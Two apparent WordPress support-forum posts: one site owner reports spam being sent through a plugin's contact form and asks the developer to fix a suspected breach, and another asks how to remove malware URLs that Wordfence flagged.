“Our security systems have detected an outgoing email from your site where it detects the email as spam with this error message “Blocked (Too Many Invalid Recipients)”
108 emails were sent today and 0 emails were sent yesterday.
Email subject “Adverts : wneiyveyxu xxx.xxx@xxxx.fr”
Recipients: CLFOxxxx@GMAIL.COM and xxx.xxx@xxxx.fr
Coming from the contact form https://xxxxx.com/advert/cession-de-patientele-cabinet-dentaire-holistique-paris-14eme/”

So it means that since that version, a malware is sending emails from my domain.
Could you please check the security of your plugin’s code and do your utmost to fix this apparent breach in your next update.
Thank you for informing me ASAP
CGC

Help removing a suspected malware URL…


Wordfence found a few of these and I would like to remove them. I found them in my code. Since I’m not a coder I have two questions.

1) What do I need to delete in the code in addition to the URLs?

2) Beyond that, can anybody suggest what file I should look for to replace the old code? Once I know it I can replace the file myself.

Thanks,
Steve
